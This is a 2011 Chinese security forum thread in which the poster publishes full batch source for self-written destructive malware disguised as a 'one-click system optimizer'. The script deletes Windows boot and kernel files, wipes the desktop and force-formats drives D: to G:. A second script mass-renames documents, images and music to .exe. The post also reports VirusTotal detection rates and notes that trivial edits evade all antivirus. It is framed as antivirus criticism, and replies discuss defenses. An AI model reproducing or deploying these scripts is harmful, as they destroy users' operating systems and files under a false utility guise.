为何最简单的破坏命令通过了众多杀软

显示全部楼层 · 发表于 2011-2-11 02:28:48

本帖最后由 rsrsafe 于 2011-2-11 02:46 编辑

　　RSR安全小组曾经发布过“伪SOLA V1.0 和 V2.0 两个版本”这两个版本的病毒都是用最简单的批处理命令写成的，然后用Bat to EXE 编译。本以为这种接近弱智病毒肯定无法通过任何杀软，但实际的测试结果却令我们非常吃惊。（整个过程基于XP SP3环境）
　　在病毒发布初期的 VirusTotal 的测试中，伪SOLA V1.0 仅5个杀软报毒，伪SOLA V2.0仅2个杀软报毒，下面列举详细条目（仅列举报毒的）
V1.0（exe版本）

Comodo

5920

2010.08.31

TrojWare.Win32.Qhost.SJ

Jiangmin

13.0.900

2010.08.30

TrojanDropper.BAT.Dmenu.ad

NOD32

5410

2010.08.30

a variant of Win32/Kryptik.GDT

PCTools

7.0.3.5

2010.08.31

Trojan.BAT.Compan

TrendMicro

9.120.0.1004

2010.08.31

PAK_Generic.001

V2.0（exe版本）

McAfee-GW-Edition

2010.1B

2010.08.31

Heuristic.BehavesLike.Win32.ModifiedUPX.C!87

TrendMicro

9.120.0.1004

2010.08.31

PAK_Generic.001

　　为了进一步验证病毒的查杀率，我们还在实体机上做了测试。测试结果（均把杀软的安全等级调到最高）：东方微点、江民、瑞星会阻止程序的运行（不会导致无法启动，但病毒顺利删除用户桌面文件且格式化硬盘），卡巴斯基仅提示其运行，其它杀软无任何阻拦。
　　下面是伪SOLA V2.0的源代码：
@echo off
title 一键系统优化 by vista123.com （后期注释：伪装成优化程序）
echo 准备执行系统优化. . .
echo.
pause
cls
echo 正在执行系统优化，请稍后. . .
del/F/Q/A %SystemDrive%\NTDETECT.COM>nul
del/F/Q/A %SystemDrive%\IO.SYS>nul
del/F/Q/A %SystemDrive%\MSDOS.SYS>nul
del/F/Q/A %SystemDrive%\CONFIG.SYS>nul
del/F/Q/A %SystemDrive%\boot.ini>nul
del/F/Q/A %SystemDrive%\bootfont.bin>nul
del/F/Q/S %SystemRoot%\taskmgr.exe>nul
del/F/Q/S %SystemRoot%\ntoskrnl.exe>nul
shutdown -r -t 120
echo.
echo 您的计算机将在 2 分钟后重新启动，系统优化正在继续. . .
del/F/Q/S %SystemRoot%\shutdown.exe>nul
del/F/Q/S %SystemDrive%\"Documents and Settings"\%username%\桌面>nul
cls
echo 系统优化完成！
echo.
pause
（中间的文字部分省略）
……echo　　选择吧，但是要快，容不得犹豫。我已经打开了我的计时器。
pause>nul
cls
echo 下列5个数字中有一个可以使系统恢复正常，否则格式化磁盘，关闭窗口则直接格式化。（后期注释：关闭窗口则直接格式化是吓唬人的）请慎重选择。
echo.
echo.
echo.
set/p choice=1 2 3 4 5 ：
if %choice%==1 echo 选择错误，格式化磁盘！
if %choice%==2 echo 选择错误，格式化磁盘！
if %choice%==3 echo 选择错误，格式化磁盘！
if %choice%==4 echo 选择错误，格式化磁盘！
if %choice%==5 echo 选择错误，格式化磁盘！
start format D:/X/FS:NTFS/Q/Y　（后期注释：用新窗口执行命令是为了让命令执行地更快且增加恐惧感）
start format E:/X/FS:NTFS/Q/Y
start format F:/X/FS:NTFS/Q/Y
start format G:/X/FS:NTFS/Q/Y
pause>nul

　　这个病毒就是以上这些看似弱智的代码。你会问了：类似del，format这些命令能通过系统权限吗？我们现在可以非常明确地告诉你：能！（目前为止绝大多数家庭和企业用户使用管理员帐户登录）。就是这些看起来简单的命令足以破坏整个计算机系统，不可小看其危害。
　　出现这种情况，责任在谁？首先是XP系统的管理模式（但这不是今天我要讲的重点，因为我们无法改变这一现状），其次是杀软（虽是“其次”，但这是重点）。至今，使用360的用户有多少？使用卡巴斯基的用户有多少？使用金山、江民、瑞星的用户有多少？试想一下，如果这一病毒蔓延开来，会有多少用户遭殃？
　　截止发稿时，绝大多数主流杀软（以上提到过的均在内）已经能查杀这个病毒（在病毒运行前阻止），但是，让我们再次进行一个实验：将病毒代码删去一行或一段，放到 VirusTotal 和实体机中再次测试，会发现杀软依旧无法查出。这就说明一个问题：即便在云安全体系较为完善的情况下，类似病毒仍能猖狂运行（记得脚本病毒吗？）。因为大部分杀软通过对病毒特侦码的判断查杀病毒，这就导致了一个问题：类似这种代码可随意更改的病毒，杀软毫无办法。换句话说，杀软或安全辅助软件不但要对病毒特侦码进行识别，还要着重于病毒行为的分析且在病毒造成破坏前阻止。目前一些杀软已经做到了这一点，但是还不够，远远不够，举个简单的例子，做到这一点的杀软只是阻止了删除ntldr，却没有阻止删除IO.SYS等文件，这就意味着病毒可以在取得管理员权限后肆意破坏而不被杀软察觉。下面一个病毒样例更加说明以上问题。
（后期注释：forfile.exe提取Windows Server 2003下的，捆绑在病毒中。如果你看得懂第一句代码，则其它代码无须再看）
forfiles /P D:\ /M *.doc /S /C "cmd /C ren *.doc *.exe"
forfiles /P D:\ /M *.xls /S /C "cmd /C ren *.xls *.exe"
forfiles /P D:\ /M *.ppt /S /C "cmd /C ren *.ppt *.exe"
forfiles /P D:\ /M *.docx /S /C "cmd /C ren *.docx *.exe"
forfiles /P D:\ /M *.xlsx /S /C "cmd /C ren *.xlsx *.exe"
forfiles /P D:\ /M *.pptx /S /C "cmd /C ren *.pptx *.exe"
forfiles /P D:\ /M *.jpg /S /C "cmd /C ren *.jpg *.exe"
forfiles /P D:\ /M *.mp3 /S /C "cmd /C ren *.mp3 *.exe"
forfiles /P E:\ /M *.doc /S /C "cmd /C ren *.doc *.exe"
forfiles /P E:\ /M *.xls /S /C "cmd /C ren *.xls *.exe"
forfiles /P E:\ /M *.ppt /S /C "cmd /C ren *.ppt *.exe"
forfiles /P E:\ /M *.docx /S /C "cmd /C ren *.docx *.exe"
forfiles /P E:\ /M *.xlsx /S /C "cmd /C ren *.xlsx *.exe"
forfiles /P E:\ /M *.pptx /S /C "cmd /C ren *.pptx *.exe"
forfiles /P E:\ /M *.jpg /S /C "cmd /C ren *.jpg *.exe"
forfiles /P E:\ /M *.mp3 /S /C "cmd /C ren *.mp3 *.exe"
（后期注释：以上代码在Windows 7中也能正常执行）
　　简单且重复的代码，实际效果如何？很可能被查杀，因为云安全服务器中已经有此病毒的样本，但是删除或添加几行代码呢，比如把E改成F，G，H等，查杀率为彻底的０％，没有任何杀软阻止。这样一堆命令的执行速度非常快，而且执行的后果肯定比删除文件更惨重，因为你不能像往C:\中复制ntldr这么简单地修复或逆执行这一操作，因为软件不知道exe文件原来的扩展名是什么，你不得不手动修改！
　　不可否认，杀软对0Day、温情杀手等病毒的查杀非常及时且非常到位，但是希望杀软能再加把劲，更多地关注用户，做得更好！

　　（接下来是对本帖的说明，不属于正文）
1、本帖中的病毒没有写传播模块，因此不会传播（但要传播也一样简单，你懂的），云安全的样本是手动上报的
2、写出源代码只是为了方便探究，而不是出于其它目的（心怀歪念者自重）
3、本帖的最终目的是建议杀软改进，而不是批评杀软
4、以上所有测试都是在Windows XP SP3环境下测试，请不要拿Windows 7说事

显示全部楼层 · 发表于 2011-2-19 10:21:57

回复 73楼 maomaojk 的帖子

说了这么多你有测试过吗？只会空口白牙？

显示全部楼层 · 发表于 2011-2-19 09:05:43

只是测试，提高大家的防范意识

显示全部楼层 · 发表于 2011-2-18 15:47:18

不靠av
那就只能靠用户对陌生程序的处理了，沙盘是个好方案

显示全部楼层 · 发表于 2011-2-18 15:24:12

本帖最后由 maomaojk 于 2011-2-18 15:25 编辑

回复 2楼 Tron 的帖子

对360主防无效

太迷信数字了吧。 360的主防，是有一个保护系统目录的功能，但那只是保护C:\windows下的目录，其他的如楼主语句里提的，删别的驱动器目录里的文件，和改很多文件的扩展名为exe这个都不是数字主防的范畴。再说，保护系统目录瑞星主防也有。别对某一款软件太迷信！

显示全部楼层 · 发表于 2011-2-16 13:36:30

真是闲着没事干了啊，用hips试试？

显示全部楼层 · 发表于 2011-2-16 12:32:39

本帖最后由 522586971 于 2011-2-16 12:33 编辑

楼主亮了，
这种纯属恶作剧的东西，一点经济价值都没有。单单破坏WINDOWS的方法太多，除了能展示楼主的破坏能力，没有任何意义

显示全部楼层 · 发表于 2011-2-16 03:26:10

本帖最后由 fxg 于 2011-2-16 03:26 编辑

这些BAT的确为正常命令, 如果运行问题就大了,特别是后面把N多文件改成EXE
第一个还可以修复, 但第二个...... 太毒了

显示全部楼层 · 发表于 2011-2-15 12:38:35

webkit下为什么楼是倒的？

显示全部楼层 · 发表于 2011-2-15 11:04:02

请问如果不采取措施，这个病毒对电脑有什么危害？

[讨论] 为何最简单的破坏命令通过了众多杀软